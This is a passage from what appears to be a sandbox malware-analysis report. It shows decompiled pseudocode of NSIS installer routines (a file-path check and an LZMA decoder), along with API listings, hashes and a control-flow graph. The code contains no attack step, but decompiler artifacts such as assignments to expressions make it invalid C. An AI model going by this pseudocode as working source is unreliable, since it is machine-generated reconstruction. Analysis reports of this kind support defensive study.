				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                            0x0040604b
                            0x00406056
                            0x0040605a
                            0x00406061
                            0x0040606d
                            0x0040607d
                            0x0040607f
                            0x00406097
                            0x00406098
                            0x0040609f
                            0x004060a0
                            0x00000000
                            0x00000000
                            0x00406083
                            0x0040608a
                            0x00406092
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040608a
                            0x004060a2
                            0x004060a8
                            0x00000000
                            0x004060b6
                            0x0040606f
                            0x00406075
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406075
                            0x0040605c
                            0x00000000

                            APIs
                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00405FF0
                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                            • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00406098
                            • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560), ref: 004060A8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                            • String ID: P_B
                            • API String ID: 3248276644-906794629
                            • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                            • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                            • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                            • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 736 407194-40719a 737 40719c-40719e 736->737 738 40719f-4071bd 736->738 737->738 739 407490-40749d 738->739 740 4073cb-4073e0 738->740 743 4074c7-4074cb 739->743 741 4073e2-4073f8 740->741 742 4073fa-407410 740->742 744 407413-40741a 741->744 742->744 745 40752b-40753e 743->745 746 4074cd-4074ee 743->746 747 407441 744->747 748 40741c-407420 744->748 751 407447-40744d 745->751 749 4074f0-407505 746->749 750 407507-40751a 746->750 747->751 752 407426-40743e 748->752 753 4075cf-4075d9 748->753 754 40751d-407524 749->754 750->754 756 406bf2 751->756 757 4075fa 751->757 752->747 758 4075e5-4075f8 753->758 759 4074c4 754->759 760 407526 754->760 761 406bf9-406bfd 756->761 762 406d39-406d5a 756->762 763 406c9e-406ca2 756->763 764 406d0e-406d12 756->764 766 4075fd-407601 757->766 758->766 759->743 767 4074a9-4074c1 760->767 768 4075db 760->768 761->758 769 406c03-406c10 761->769 762->740 772 406ca8-406cc1 763->772 773 40754e-407558 763->773 770 406d18-406d2c 764->770 771 40755d-407567 764->771 767->759 768->758 769->757 774 406c16-406c5c 769->774 775 406d2f-406d37 770->775 771->758 776 406cc4-406cc8 772->776 773->758 777 406c84-406c86 774->777 778 406c5e-406c62 774->778 775->762 775->764 776->763 779 406cca-406cd0 776->779 784 406c94-406c9c 777->784 785 406c88-406c92 777->785 782 406c64-406c67 GlobalFree 778->782 783 406c6d-406c7b GlobalAlloc 778->783 780 406cd2-406cd9 779->780 781 406cfa-406d0c 779->781 786 406ce4-406cf4 GlobalAlloc 780->786 787 406cdb-406cde GlobalFree 780->787 781->775 782->783 783->757 788 406c81 783->788 784->776 785->784 785->785 786->757 786->781 787->786 788->777
                            C-Code - Quality: 99%
                            			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
